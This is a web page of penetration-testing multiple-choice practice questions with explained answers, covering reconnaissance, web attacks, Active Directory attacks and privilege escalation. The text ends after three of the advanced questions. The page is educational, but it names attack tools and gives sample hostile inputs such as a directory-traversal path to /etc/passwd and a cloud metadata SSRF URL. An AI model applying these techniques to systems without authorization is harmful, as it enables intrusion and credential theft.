Penetration Testing MCQ 60 Tests With Answers (2026)
PerfectNotes TeamUpdated: March 2026~15 min practice 60 Questions Β· 3 Levels 60 Questions Β· 3 Levels
Penetration testing MCQ practice questions are essential for preparing for competitive exams, certifications (CompTIA PenTest+, CEH, eJPT, OSCP), and technical interviews. This comprehensive MCQ platform provides 60 carefully curated practice questions covering penetration testing methodology, reconnaissance, exploitation, privilege escalation, lateral movement, and pentest reporting.
These questions are organized into three progressive difficulty levels of 20 questions each: Basics (covering foundational terminology, pre-engagement scoping, and passive/active reconnaissance), Concepts (covering vulnerability scanning, Metasploit usage, and core exploitation methodologies), and Advanced (covering scenario-based privilege escalation, lateral movement, Active Directory exploitation, and professional reporting). Each question includes a verified, in-depth explanation to reinforce learning.
Practice in Study Mode to reveal answers and detailed explanations instantly, or use Exam Mode for timed testing and real-time scoring to simulate CompTIA or university exam conditions. The interactive engine tracks your progress and identifies knowledge gaps across scoping, scanning, exploitation, privilege escalation, lateral movement, and report writing.
Contents
- 1.Basics (20 Questions)PTES phases Β· scoping Β· active & passive reconnaissance
- 2.Concepts (20 Questions)Vulnerability scanning Β· Metasploit Β· web app exploits
- 3.Advanced (20 Questions)Scenario-based Β· privilege escalation Β· Active Directory Β· reporting
- 4.Conclusionsummary Β· next steps Β· study tips
- 5.Key Takeawaysquick-fire bullet recap of essential facts
- 6.Quick Review Summaryconcept Β· definition Β· key fact table
- 7.FAQcommon questions answered
Penetration Testing β Basics
1What is the primary difference between a vulnerability scan and a penetration test?
CorrectC: A vulnerability scan identifies potential flaws, while a penetration test actively exploits them to determine actual business risk and impact.
A vulnerability scan uses automated tools to identify potential weaknesses without verifying exploitability. A penetration test goes further by actively exploiting verified vulnerabilities to demonstrate real-world business risk, impact, and attack paths.
IncorrectC: A vulnerability scan identifies potential flaws, while a penetration test actively exploits them to determine actual business risk and impact.
A vulnerability scan uses automated tools to identify potential weaknesses without verifying exploitability. A penetration test goes further by actively exploiting verified vulnerabilities to demonstrate real-world business risk, impact, and attack paths.
2In the context of a penetration testing engagement, what is the function of the "Rules of Engagement" (RoE)?
CorrectB: The formal document defining the specific timelines, authorized targets, permitted attack types, and communication boundaries of the engagement.
The Rules of Engagement (RoE) is a critical pre-engagement document that establishes the legal and operational boundaries of the test: which systems are in scope, what attack techniques are permitted, hours of operation, and emergency escalation contacts.
IncorrectB: The formal document defining the specific timelines, authorized targets, permitted attack types, and communication boundaries of the engagement.
The Rules of Engagement (RoE) is a critical pre-engagement document that establishes the legal and operational boundaries of the test: which systems are in scope, what attack techniques are permitted, hours of operation, and emergency escalation contacts.
3What is the defining characteristic of a "Black Box" penetration test?
CorrectD: The tester is given zero prior knowledge of the internal architecture, source code, or credentials of the target environment.
A Black Box test simulates a real external attacker who has no insider knowledge. The tester receives only the company name or a single IP address and must discover everything through reconnaissance β making it the most realistic simulation of an opportunistic external attack.
IncorrectD: The tester is given zero prior knowledge of the internal architecture, source code, or credentials of the target environment.
A Black Box test simulates a real external attacker who has no insider knowledge. The tester receives only the company name or a single IP address and must discover everything through reconnaissance β making it the most realistic simulation of an opportunistic external attack.
4According to the Penetration Testing Execution Standard (PTES), which phase immediately follows "Pre-engagement Interactions"?
CorrectA: Intelligence Gathering (OSINT and Reconnaissance)
The PTES defines seven phases in order: Pre-engagement Interactions β Intelligence Gathering β Threat Modeling β Vulnerability Analysis β Exploitation β Post-Exploitation β Reporting. Intelligence Gathering (OSINT/recon) is the second phase, immediately after scoping.
IncorrectA: Intelligence Gathering (OSINT and Reconnaissance)
The PTES defines seven phases in order: Pre-engagement Interactions β Intelligence Gathering β Threat Modeling β Vulnerability Analysis β Exploitation β Post-Exploitation β Reporting. Intelligence Gathering (OSINT/recon) is the second phase, immediately after scoping.
5In exploitation frameworks like Metasploit, what is a "Payload"?
CorrectC: The piece of code executed on the target system after a vulnerability has been successfully exploited to achieve a specific objective.
In Metasploit, the exploit is the code that triggers the vulnerability, while the payload is the code that runs after a successful exploit to achieve an objective β such as opening a Meterpreter session, adding a user, or executing a command.
IncorrectC: The piece of code executed on the target system after a vulnerability has been successfully exploited to achieve a specific objective.
In Metasploit, the exploit is the code that triggers the vulnerability, while the payload is the code that runs after a successful exploit to achieve an objective β such as opening a Meterpreter session, adding a user, or executing a command.
6Which statement accurately describes the difference between an Exploit and a Vulnerability?
CorrectA: A vulnerability is a weakness in a system; an exploit is the actual code or methodology used to take advantage of that weakness.
A vulnerability is a flaw or weakness (e.g., an unpatched buffer overflow) inherent in software or configuration. An exploit is the purposeful code, technique, or sequence of actions that leverages that vulnerability to achieve unauthorized access or behavior.
IncorrectA: A vulnerability is a weakness in a system; an exploit is the actual code or methodology used to take advantage of that weakness.
A vulnerability is a flaw or weakness (e.g., an unpatched buffer overflow) inherent in software or configuration. An exploit is the purposeful code, technique, or sequence of actions that leverages that vulnerability to achieve unauthorized access or behavior.
7How does a "Gray Box" penetration test operate?
CorrectD: The tester is provided with partial knowledge of the internal network, often simulating the perspective of a standard, low-level internal employee.
A Gray Box test simulates a partially informed attacker β like a disgruntled employee, a compromised contractor, or a user with standard credentials. The tester receives some information (e.g., a network map or basic credentials) but not full administrative access.
IncorrectD: The tester is provided with partial knowledge of the internal network, often simulating the perspective of a standard, low-level internal employee.
A Gray Box test simulates a partially informed attacker β like a disgruntled employee, a compromised contractor, or a user with standard credentials. The tester receives some information (e.g., a network map or basic credentials) but not full administrative access.
8What is the primary purpose of the Nmap utility in a penetration test?
CorrectB: Discovering active hosts, open ports, and running services across a target network.
Nmap (Network Mapper) is the industry-standard tool for network discovery and security auditing. It is used to identify live hosts, enumerate open TCP/UDP ports, detect running service versions, and identify the operating system β forming the foundation of network reconnaissance.
IncorrectB: Discovering active hosts, open ports, and running services across a target network.
Nmap (Network Mapper) is the industry-standard tool for network discovery and security auditing. It is used to identify live hosts, enumerate open TCP/UDP ports, detect running service versions, and identify the operating system β forming the foundation of network reconnaissance.
9What does the "Scope" of a penetration test define?
CorrectB: The explicit list of IP addresses, domains, and applications that the tester is legally authorized to target.
The scope document is a legally binding agreement specifying exactly which assets (IP ranges, FQDN, applications, APIs) are approved for testing. Targeting systems outside the defined scope is unauthorized access and potentially illegal, regardless of intent.
IncorrectB: The explicit list of IP addresses, domains, and applications that the tester is legally authorized to target.
The scope document is a legally binding agreement specifying exactly which assets (IP ranges, FQDN, applications, APIs) are approved for testing. Targeting systems outside the defined scope is unauthorized access and potentially illegal, regardless of intent.
10What does the practice of OSINT (Open-Source Intelligence) entail?
CorrectC: Gathering actionable intelligence and reconnaissance about a target using publicly available, legal resources.
OSINT involves collecting intelligence from publicly accessible sources: WHOIS records, DNS data, LinkedIn profiles, job postings, GitHub repositories, Shodan, Maltego, and social media. It allows testers to map an organization's attack surface without touching their systems.
IncorrectC: Gathering actionable intelligence and reconnaissance about a target using publicly available, legal resources.
OSINT involves collecting intelligence from publicly accessible sources: WHOIS records, DNS data, LinkedIn profiles, job postings, GitHub repositories, Shodan, Maltego, and social media. It allows testers to map an organization's attack surface without touching their systems.
11In the context of vulnerability analysis, what is a "False Positive"?
CorrectA: An automated scanner reports a vulnerability that does not actually exist or is adequately mitigated by other compensating controls.
A false positive is when a scanner flags something as vulnerable when it is not β either because the flaw doesn't exist, has already been patched, or is blocked by compensating controls like a WAF. Manual verification is essential to separate false positives from true vulnerabilities.
IncorrectA: An automated scanner reports a vulnerability that does not actually exist or is adequately mitigated by other compensating controls.
A false positive is when a scanner flags something as vulnerable when it is not β either because the flaw doesn't exist, has already been patched, or is blocked by compensating controls like a WAF. Manual verification is essential to separate false positives from true vulnerabilities.
12What is the primary goal of the "Post-Exploitation" phase?
CorrectD: To determine the true value of the compromised machine, escalate privileges, and establish persistent access.
Post-exploitation focuses on maximizing the impact and value of an already-compromised host: escalating privileges from user to SYSTEM/root, pivoting to adjacent network segments, establishing persistence (backdoors), and exfiltrating sensitive data to demonstrate business impact.
IncorrectD: To determine the true value of the compromised machine, escalate privileges, and establish persistent access.
Post-exploitation focuses on maximizing the impact and value of an already-compromised host: escalating privileges from user to SYSTEM/root, pivoting to adjacent network segments, establishing persistence (backdoors), and exfiltrating sensitive data to demonstrate business impact.
13How does a Red Team engagement generally differ from a standard Penetration Test?
CorrectA: A penetration test aims to identify as many vulnerabilities as possible, while a Red Team engagement simulates a specific advanced adversary to test the organization's detection and response capabilities.
A penetration test is broad β find as many vulnerabilities as possible. A Red Team engagement is objective-driven β simulate a specific threat actor (e.g., APT) targeting a specific crown jewel (e.g., financial data) to test whether the Blue Team's detection and response will catch the attack.
IncorrectA: A penetration test aims to identify as many vulnerabilities as possible, while a Red Team engagement simulates a specific advanced adversary to test the organization's detection and response capabilities.
A penetration test is broad β find as many vulnerabilities as possible. A Red Team engagement is objective-driven β simulate a specific threat actor (e.g., APT) targeting a specific crown jewel (e.g., financial data) to test whether the Blue Team's detection and response will catch the attack.
14Which of the following is a classic example of "Pretexting" in social engineering?
CorrectD: Creating a fabricated, elaborate scenario or persona to manipulate a target into divulging confidential information.
Pretexting involves creating a fabricated scenario (pretext) to establish trust and manipulate a target β e.g., impersonating an IT support technician calling to "verify credentials" or posing as a vendor to gain physical access. It relies on psychological manipulation rather than technical exploits.
IncorrectD: Creating a fabricated, elaborate scenario or persona to manipulate a target into divulging confidential information.
Pretexting involves creating a fabricated scenario (pretext) to establish trust and manipulate a target β e.g., impersonating an IT support technician calling to "verify credentials" or posing as a vendor to gain physical access. It relies on psychological manipulation rather than technical exploits.
15What occurs during the "Clean-up" phase of a penetration test?
CorrectB: Restoring the target systems to their original pre-engagement state by removing backdoors, test accounts, and uploaded binaries.
Clean-up (also called Remediation Support) ensures the tester's artifacts do not remain as a secondary attack surface. This includes removing every backdoor, test user account, web shell, uploaded tool, and scheduled task created during the engagement β leaving the environment exactly as found.
IncorrectB: Restoring the target systems to their original pre-engagement state by removing backdoors, test accounts, and uploaded binaries.
Clean-up (also called Remediation Support) ensures the tester's artifacts do not remain as a secondary attack surface. This includes removing every backdoor, test user account, web shell, uploaded tool, and scheduled task created during the engagement β leaving the environment exactly as found.
16What is the functional purpose of a "Reverse Shell"?
CorrectC: A payload that forces the compromised target machine to proactively initiate an outbound connection back to the attacker's listening machine.
A reverse shell inverts the connection direction: rather than the attacker connecting inbound to a target (which is typically blocked by firewalls), the compromised target initiates an outbound connection to the attacker's listener. Outbound connections are far less likely to be blocked by perimeter firewalls.
IncorrectC: A payload that forces the compromised target machine to proactively initiate an outbound connection back to the attacker's listening machine.
A reverse shell inverts the connection direction: rather than the attacker connecting inbound to a target (which is typically blocked by firewalls), the compromised target initiates an outbound connection to the attacker's listener. Outbound connections are far less likely to be blocked by perimeter firewalls.
17What does CVSS stand for in vulnerability management?
CorrectB: Common Vulnerability Scoring System
CVSS (Common Vulnerability Scoring System) is an industry-standard framework for rating the severity of security vulnerabilities on a 0β10 scale. It evaluates base metrics (attack vector, complexity, privileges required, impact) to produce a standardized, vendor-neutral severity score.
IncorrectB: Common Vulnerability Scoring System
CVSS (Common Vulnerability Scoring System) is an industry-standard framework for rating the severity of security vulnerabilities on a 0β10 scale. It evaluates base metrics (attack vector, complexity, privileges required, impact) to produce a standardized, vendor-neutral severity score.
18How does a "Bug Bounty" program differ from a traditional penetration test?
CorrectA: A Bug Bounty is a continuous, crowdsourced program where independent researchers are financially rewarded for finding and reporting vulnerabilities in specific assets.
Bug Bounty programs (e.g., HackerOne, Bugcrowd) are ongoing, crowd-sourced initiatives where organizations invite external security researchers to find and responsibly disclose vulnerabilities in exchange for financial rewards. Unlike a time-boxed pentest, they run continuously.
IncorrectA: A Bug Bounty is a continuous, crowdsourced program where independent researchers are financially rewarded for finding and reporting vulnerabilities in specific assets.
Bug Bounty programs (e.g., HackerOne, Bugcrowd) are ongoing, crowd-sourced initiatives where organizations invite external security researchers to find and responsibly disclose vulnerabilities in exchange for financial rewards. Unlike a time-boxed pentest, they run continuously.
19In payload delivery, what is a "Dropper"?
CorrectD: A lightweight, initial piece of malware designed strictly to download and execute the primary, heavier malicious payload from a remote server.
A dropper is a small, often heavily obfuscated executable that serves as the first stage of a multi-stage attack. Its sole job is to evade initial AV detection, establish a beachhead, then silently download and execute the real, heavier payload (like a RAT or ransomware) from a C2 server.
IncorrectD: A lightweight, initial piece of malware designed strictly to download and execute the primary, heavier malicious payload from a remote server.
A dropper is a small, often heavily obfuscated executable that serves as the first stage of a multi-stage attack. Its sole job is to evade initial AV detection, establish a beachhead, then silently download and execute the real, heavier payload (like a RAT or ransomware) from a C2 server.
20What is the primary purpose of a Non-Disclosure Agreement (NDA) in a penetration test?
CorrectC: To legally ensure that the penetration testers do not publicly disclose or misuse any sensitive data or vulnerabilities discovered during the engagement.
The NDA is a legal instrument that binds the penetration testing firm to strict confidentiality. Testers inevitably access highly sensitive data (credentials, PII, financial records). The NDA ensures this information cannot be disclosed to third parties or used for any purpose outside the engagement.
IncorrectC: To legally ensure that the penetration testers do not publicly disclose or misuse any sensitive data or vulnerabilities discovered during the engagement.
The NDA is a legal instrument that binds the penetration testing firm to strict confidentiality. Testers inevitably access highly sensitive data (credentials, PII, financial records). The NDA ensures this information cannot be disclosed to third parties or used for any purpose outside the engagement.
Penetration Testing β Concepts
1According to the OWASP Top 10, which scenario best describes a "Broken Access Control" vulnerability?
CorrectD: An authenticated user successfully altering a URL parameter (e.g., user_id=5 to user_id=6) to view another user's private account details.
Broken Access Control (OWASP A01) occurs when applications fail to enforce proper authorization. An IDOR (Insecure Direct Object Reference) β manipulating user_id=5 to user_id=6 to see another user's data β is the canonical example. The application authenticates the user but doesn't verify they own the requested resource.
IncorrectD: An authenticated user successfully altering a URL parameter (e.g., user_id=5 to user_id=6) to view another user's private account details.
Broken Access Control (OWASP A01) occurs when applications fail to enforce proper authorization. An IDOR (Insecure Direct Object Reference) β manipulating user_id=5 to user_id=6 to see another user's data β is the canonical example. The application authenticates the user but doesn't verify they own the requested resource.
2How does the Nmap SYN scan (-sS) achieve its stealthier profile compared to a Connect scan (-sT)?
CorrectC: It sends a SYN packet, waits for a SYN/ACK, and then sends an RST to tear down the connection before it is fully established, preventing the target application from logging the connection.
The SYN scan (half-open scan) never completes the TCP handshake. It sends SYN, receives SYN/ACK (confirming the port is open), then sends RST to abort β never reaching the application layer. Many logging systems only record fully established connections, making SYN scans harder to detect.
IncorrectC: It sends a SYN packet, waits for a SYN/ACK, and then sends an RST to tear down the connection before it is fully established, preventing the target application from logging the connection.
The SYN scan (half-open scan) never completes the TCP handshake. It sends SYN, receives SYN/ACK (confirming the port is open), then sends RST to abort β never reaching the application layer. Many logging systems only record fully established connections, making SYN scans harder to detect.
3In Burp Suite, what is the functional difference between the "Intruder" and "Repeater" tools?
CorrectA: Intruder is used for automated, customized fuzzing and brute-forcing across multiple requests, while Repeater is used to manually manipulate and resend individual HTTP requests.
Burp Repeater allows manual, iterative request manipulation β ideal for testing a single parameter. Burp Intruder automates payload injection across multiple positions in a request (fuzzing, brute-forcing logins, testing all parameters simultaneously) using customizable payload lists and attack types.
IncorrectA: Intruder is used for automated, customized fuzzing and brute-forcing across multiple requests, while Repeater is used to manually manipulate and resend individual HTTP requests.
Burp Repeater allows manual, iterative request manipulation β ideal for testing a single parameter. Burp Intruder automates payload injection across multiple positions in a request (fuzzing, brute-forcing logins, testing all parameters simultaneously) using customizable payload lists and attack types.
4How does a UNION-based SQL Injection attack extract data from a database?
CorrectB: It combines the results of the application's original query with the results of an injected malicious query, returning the combined dataset directly into the application's HTTP response.
UNION-based SQLi appends a second SELECT statement to the original query using the UNION operator. The database combines both result sets and returns them in the HTTP response. This requires the injected query to match the same number and data types of columns as the original query.
IncorrectB: It combines the results of the application's original query with the results of an injected malicious query, returning the combined dataset directly into the application's HTTP response.
UNION-based SQLi appends a second SELECT statement to the original query using the UNION operator. The database combines both result sets and returns them in the HTTP response. This requires the injected query to match the same number and data types of columns as the original query.
5What is the fundamental difference between Stored XSS and Reflected XSS?
CorrectB: Stored XSS permanently saves the malicious script on the target server (e.g., in a forum post) serving it to future visitors, while Reflected XSS executes immediately and requires the victim to click a specially crafted malicious link.
Stored (Persistent) XSS saves the payload server-side β every user who views the infected page is attacked without any interaction. Reflected XSS requires tricking a specific victim into clicking a crafted URL containing the payload, which the server reflects back the victim's browser executes.
IncorrectB: Stored XSS permanently saves the malicious script on the target server (e.g., in a forum post) serving it to future visitors, while Reflected XSS executes immediately and requires the victim to click a specially crafted malicious link.
Stored (Persistent) XSS saves the payload server-side β every user who views the infected page is attacked without any interaction. Reflected XSS requires tricking a specific victim into clicking a crafted URL containing the payload, which the server reflects back the victim's browser executes.
6In the Hashcat password cracking utility, how does a "Combinator" attack operate?
CorrectC: It appends each word from one wordlist to every word in a second wordlist (e.g., combining "admin" and "password" to test "adminpassword").
Hashcat's Combinator attack (attack mode -a 1) takes two wordlists and generates candidates by appending every word from list2 to every word from list1. This is effective against users who create passwords by concatenating two common words (e.g., 'sunflower' + 'summer' = 'sunflowersummer').
IncorrectC: It appends each word from one wordlist to every word in a second wordlist (e.g., combining "admin" and "password" to test "adminpassword").
Hashcat's Combinator attack (attack mode -a 1) takes two wordlists and generates candidates by appending every word from list2 to every word from list1. This is effective against users who create passwords by concatenating two common words (e.g., 'sunflower' + 'summer' = 'sunflowersummer').
7During an internal penetration test, what is the BloodHound tool primarily used for?
CorrectD: To utilize graph theory to visually map complex Active Directory relationships, group delegations, and hidden privilege escalation paths.
BloodHound uses graph theory (nodes and edges) to represent Active Directory objects and their relationships. Paired with the SharpHound collector, it maps attack paths from a low-privilege user account to Domain Admin β revealing delegation misconfigurations, group policy abuse, and hidden privilege chains invisible in raw AD data.
IncorrectD: To utilize graph theory to visually map complex Active Directory relationships, group delegations, and hidden privilege escalation paths.
BloodHound uses graph theory (nodes and edges) to represent Active Directory objects and their relationships. Paired with the SharpHound collector, it maps attack paths from a low-privilege user account to Domain Admin β revealing delegation misconfigurations, group policy abuse, and hidden privilege chains invisible in raw AD data.
8What is the core mechanism of a Pass-the-Hash (PtH) attack?
CorrectA: Authenticating to a remote Windows system by supplying the valid NTLM hash of a user's password to the authentication protocol, completely bypassing the need to know or crack the actual plaintext password.
Pass-the-Hash exploits the Windows NTLM authentication protocol, which accepts the password hash directly as proof of identity without requiring the plaintext password. Using tools like Mimikatz or impacket's psexec.py, an attacker can authenticate to remote systems using only the extracted hash.
IncorrectA: Authenticating to a remote Windows system by supplying the valid NTLM hash of a user's password to the authentication protocol, completely bypassing the need to know or crack the actual plaintext password.
Pass-the-Hash exploits the Windows NTLM authentication protocol, which accepts the password hash directly as proof of identity without requiring the plaintext password. Using tools like Mimikatz or impacket's psexec.py, an attacker can authenticate to remote systems using only the extracted hash.
9What is the primary objective when capturing the WPA2 4-way handshake during a wireless penetration test?
CorrectC: To capture the cryptographic nonce exchange during a client's connection process, allowing the attacker to attempt to crack the Pre-Shared Key (PSK) offline.
The WPA2 4-way handshake exchanges nonces (ANonce and SNonce) between the AP and client. Capturing this handshake allows the attacker to perform offline dictionary/brute-force attacks against the Pre-Shared Key using tools like hashcat or aircrack-ng, without maintaining a live connection to the network.
IncorrectC: To capture the cryptographic nonce exchange during a client's connection process, allowing the attacker to attempt to crack the Pre-Shared Key (PSK) offline.
The WPA2 4-way handshake exchanges nonces (ANonce and SNonce) between the AP and client. Capturing this handshake allows the attacker to perform offline dictionary/brute-force attacks against the Pre-Shared Key using tools like hashcat or aircrack-ng, without maintaining a live connection to the network.
10What is a significant operational advantage of utilizing the Metasploit Meterpreter payload over a standard command shell?
CorrectA: It operates entirely in memory using reflective DLL injection, writing nothing to the physical disk to avoid triggering traditional static antivirus file scans.
Meterpreter is injected into a running process via reflective DLL injection and operates entirely in RAM. Because it never writes to disk as a standalone executable, it evades traditional signature-based AV that scans files. It also provides an encrypted channel and rich post-exploitation modules.
IncorrectA: It operates entirely in memory using reflective DLL injection, writing nothing to the physical disk to avoid triggering traditional static antivirus file scans.
Meterpreter is injected into a running process via reflective DLL injection and operates entirely in RAM. Because it never writes to disk as a standalone executable, it evades traditional signature-based AV that scans files. It also provides an encrypted channel and rich post-exploitation modules.
11In Linux privilege escalation, what is the security implication of a binary having the SUID bit set?
CorrectB: It allows the executable to run with the permissions of the file's owner (often root), which can be abused to gain a root shell if the binary is poorly configured or vulnerable.
The SUID (Set User ID) bit causes a binary to execute with the permissions of its owner rather than the invoking user. If a root-owned binary with SUID has a vulnerability (e.g., a shell escape, unsafe path handling, or a command injection), any user can exploit it to gain a root shell.
IncorrectB: It allows the executable to run with the permissions of the file's owner (often root), which can be abused to gain a root shell if the binary is poorly configured or vulnerable.
The SUID (Set User ID) bit causes a binary to execute with the permissions of its owner rather than the invoking user. If a root-owned binary with SUID has a vulnerability (e.g., a shell escape, unsafe path handling, or a command injection), any user can exploit it to gain a root shell.
12What causes an "Unquoted Service Path" vulnerability in the Windows operating system?
CorrectD: The file path to a service executable contains spaces and lacks enclosing quotation marks, causing the Windows API to mistakenly execute a maliciously placed binary in a parent directory with a matching name.
When a Windows service path like `C:\Program Files\My App\service.exe` lacks quotes, the SCM attempts to execute `C:\Program.exe`, then `C:\Program Files\My.exe`, etc. If an attacker places a binary at any of these intermediate paths with write permissions, they gain SYSTEM execution when the service restarts.
IncorrectD: The file path to a service executable contains spaces and lacks enclosing quotation marks, causing the Windows API to mistakenly execute a maliciously placed binary in a parent directory with a matching name.
When a Windows service path like `C:\Program Files\My App\service.exe` lacks quotes, the SCM attempts to execute `C:\Program.exe`, then `C:\Program Files\My.exe`, etc. If an attacker places a binary at any of these intermediate paths with write permissions, they gain SYSTEM execution when the service restarts.
13What is the execution methodology of a Local File Inclusion (LFI) / Directory Traversal attack?
CorrectA: Manipulating a web application's file path parameter (e.g., using ../../../../etc/passwd) to navigate outside the intended web root and access sensitive local files.
LFI exploits insufficient input validation on file path parameters. By injecting `../../../../etc/passwd` (or null bytes, encoded variations), an attacker traverses outside the web root to read sensitive local files. In severe cases, LFI combined with log poisoning can achieve Remote Code Execution.
IncorrectA: Manipulating a web application's file path parameter (e.g., using ../../../../etc/passwd) to navigate outside the intended web root and access sensitive local files.
LFI exploits insufficient input validation on file path parameters. By injecting `../../../../etc/passwd` (or null bytes, encoded variations), an attacker traverses outside the web root to read sensitive local files. In severe cases, LFI combined with log poisoning can achieve Remote Code Execution.
14What is the fundamental mechanism of a Server-Side Request Forgery (SSRF) attack?
CorrectB: Tricking the vulnerable backend server into making HTTP requests to internal or external resources on behalf of the attacker, effectively bypassing external firewalls to access internal services.
SSRF abuses server-side URL fetching functionality. The attacker provides a malicious URL (e.g., http://169.254.169.254/metadata or http://internal-db:5432) causing the server to make requests on the attacker's behalf β bypassing firewalls and exposing internal services invisible from the internet.
IncorrectB: Tricking the vulnerable backend server into making HTTP requests to internal or external resources on behalf of the attacker, effectively bypassing external firewalls to access internal services.
SSRF abuses server-side URL fetching functionality. The attacker provides a malicious URL (e.g., http://169.254.169.254/metadata or http://internal-db:5432) causing the server to make requests on the attacker's behalf β bypassing firewalls and exposing internal services invisible from the internet.
15In malware development and evasion, what is the specific role of a "Packer"?
CorrectC: A program that compresses and encrypts an executable payload to alter its on-disk signature and evade static antivirus detection, unpacking itself in memory during execution.
Packers compress and/or encrypt a malicious binary, producing a new executable with a completely different signature. The packed file contains a stub that, at runtime, decompresses/decrypts the original payload in memory and executes it β evading static analysis and AV signature detection while maintaining functionality.
IncorrectC: A program that compresses and encrypts an executable payload to alter its on-disk signature and evade static antivirus detection, unpacking itself in memory during execution.
Packers compress and/or encrypt a malicious binary, producing a new executable with a completely different signature. The packed file contains a stub that, at runtime, decompresses/decrypts the original payload in memory and executes it β evading static analysis and AV signature detection while maintaining functionality.
16How does the Sysinternals PsExec utility establish remote command execution for lateral movement?
CorrectD: It uploads a temporary service executable to the hidden ADMIN$ share and interacts with the Service Control Manager (SCM) using SMB to execute it.
PsExec copies a small service binary (PSEXESVC.exe) to the target's ADMIN$ share via SMB, then uses the Service Control Manager (SCM) over the IPC$ pipe to start the service, which executes commands and relays output back to the initiating machine β requiring valid admin credentials.
IncorrectD: It uploads a temporary service executable to the hidden ADMIN$ share and interacts with the Service Control Manager (SCM) using SMB to execute it.
PsExec copies a small service binary (PSEXESVC.exe) to the target's ADMIN$ share via SMB, then uses the Service Control Manager (SCM) over the IPC$ pipe to start the service, which executes commands and relays output back to the initiating machine β requiring valid admin credentials.
17During internal network enumeration, what does a successful "SMB Null Session" provide to an attacker?
CorrectB: An unauthenticated connection to the IPC$ share that allows the attacker to anonymously enumerate network shares, users, groups, and password policies.
SMB Null Sessions (anonymous logins to IPC$) were a significant issue in legacy Windows (pre-Vista). They allowed unauthenticated enumerations via RPC calls β listing user accounts, group memberships, shares, and password policies using tools like enum4linux or rpcclient.
IncorrectB: An unauthenticated connection to the IPC$ share that allows the attacker to anonymously enumerate network shares, users, groups, and password policies.
SMB Null Sessions (anonymous logins to IPC$) were a significant issue in legacy Windows (pre-Vista). They allowed unauthenticated enumerations via RPC calls β listing user accounts, group memberships, shares, and password policies using tools like enum4linux or rpcclient.
18How does the "Responder" tool typically capture credentials on a Windows network?
CorrectC: It poisons LLMNR, NBT-NS, and mDNS multicast requests, serving fake authentication prompts to capture NTLMv1/v2 hashes from victim machines attempting to connect to mistyped or non-existent network resources.
Responder listens for broadcast name resolution queries (LLMNR, NBT-NS, mDNS) that occur when a Windows host fails DNS resolution. It responds as the requested resource and captures the NTLM authentication hash when the victim automatically attempts to authenticate β requiring no user interaction.
IncorrectC: It poisons LLMNR, NBT-NS, and mDNS multicast requests, serving fake authentication prompts to capture NTLMv1/v2 hashes from victim machines attempting to connect to mistyped or non-existent network resources.
Responder listens for broadcast name resolution queries (LLMNR, NBT-NS, mDNS) that occur when a Windows host fails DNS resolution. It responds as the requested resource and captures the NTLM authentication hash when the victim automatically attempts to authenticate β requiring no user interaction.
19What is the fundamental mechanism of a Cross-Site Request Forgery (CSRF) attack?
CorrectD: An attack that forces an authenticated user's browser to execute unwanted, state-changing actions (like transferring funds or changing an email) on a vulnerable web application without their knowledge.
CSRF exploits the browser's automatic inclusion of session cookies in every request. A malicious page on a different origin triggers a request to the victim's authenticated application (e.g., bank transfer). The server sees a valid session cookie and processes the action β mitigated by CSRF tokens or SameSite cookies.
IncorrectD: An attack that forces an authenticated user's browser to execute unwanted, state-changing actions (like transferring funds or changing an email) on a vulnerable web application without their knowledge.
CSRF exploits the browser's automatic inclusion of session cookies in every request. A malicious page on a different origin triggers a request to the victim's authenticated application (e.g., bank transfer). The server sees a valid session cookie and processes the action β mitigated by CSRF tokens or SameSite cookies.
20In post-exploitation, what is the architectural difference between a Bind Shell and a Reverse Shell?
CorrectA: A bind shell opens a listening port on the compromised target for the attacker to connect to; a reverse shell forces the target to initiate an outbound connection back to the attacker.
A bind shell binds a shell to a port on the target and waits for the attacker to connect inbound β but inbound connections are usually blocked by firewalls. A reverse shell has the target connect outbound to the attacker's listener β typically allowed by firewalls since outbound traffic is less restricted.
IncorrectA: A bind shell opens a listening port on the compromised target for the attacker to connect to; a reverse shell forces the target to initiate an outbound connection back to the attacker.
A bind shell binds a shell to a port on the target and waits for the attacker to connect inbound β but inbound connections are usually blocked by firewalls. A reverse shell has the target connect outbound to the attacker's listener β typically allowed by firewalls since outbound traffic is less restricted.
Penetration Testing β Advanced
1What is the mechanical process of a "Kerberoasting" attack?
CorrectB: Requesting Kerberos Service Principal Name (SPN) tickets (TGS) for service accounts and extracting them from memory to crack the RC4/AES encrypted ticket offline, revealing the plaintext service account password.
Any domain user can legitimately request a TGS ticket for any SPN-registered service account. The ticket is encrypted with the service account's password hash. Using Impacket's GetUserSPNs.py or Rubeus, testers extract these tickets and crack them offline with Hashcat (mode 13100) to recover the service account's plaintext password.
IncorrectB: Requesting Kerberos Service Principal Name (SPN) tickets (TGS) for service accounts and extracting them from memory to crack the RC4/AES encrypted ticket offline, revealing the plaintext service account password.
Any domain user can legitimately request a TGS ticket for any SPN-registered service account. The ticket is encrypted with the service account's password hash. Using Impacket's GetUserSPNs.py or Rubeus, testers extract these tickets and crack them offline with Hashcat (mode 13100) to recover the service account's plaintext password.
2Why is an AS-REP Roasting attack often easier to execute than a standard password spray, provided the target environment is vulnerable?
CorrectA: It specifically targets user accounts that have the "Do not require Kerberos preauthentication" attribute enabled, allowing the attacker to request and crack the AS-REP encrypted message offline without needing initial access credentials.
AS-REP Roasting targets accounts with Kerberos pre-authentication disabled. The KDC responds to unauthenticated AS-REQ packets with an AS-REP containing data encrypted with the user's password hash. This can be retrieved with zero valid credentials (just a username list) and cracked offline using Hashcat mode 18200.
IncorrectA: It specifically targets user accounts that have the "Do not require Kerberos preauthentication" attribute enabled, allowing the attacker to request and crack the AS-REP encrypted message offline without needing initial access credentials.
AS-REP Roasting targets accounts with Kerberos pre-authentication disabled. The KDC responds to unauthenticated AS-REQ packets with an AS-REP containing data encrypted with the user's password hash. This can be retrieved with zero valid credentials (just a username list) and cracked offline using Hashcat mode 18200.
3During the exploitation of a classic Stack-Based Buffer Overflow, what is the critical role of the EIP (x86) or RIP (x64) register?
CorrectD: It is the Instruction Pointer, which dictates the memory address of the next CPU instruction to be executed, making it the primary target for control-flow hijacking to execute shellcode.
When the stack overflows, the saved return address (which is loaded into EIP/RIP when the function returns) is overwritten. By controlling EIP/RIP to point to the attacker's shellcode (or a ROP gadget), the tester redirects the CPU's execution flow to arbitrary malicious instructions.
IncorrectD: It is the Instruction Pointer, which dictates the memory address of the next CPU instruction to be executed, making it the primary target for control-flow hijacking to execute shellcode.
When the stack overflows, the saved return address (which is loaded into EIP/RIP when the function returns) is overwritten. By controlling EIP/RIP to point to the attacker's shellcode (or a ROP gadget), the tester redirects the CPU's execution flow to arbitrary malicious instructions.
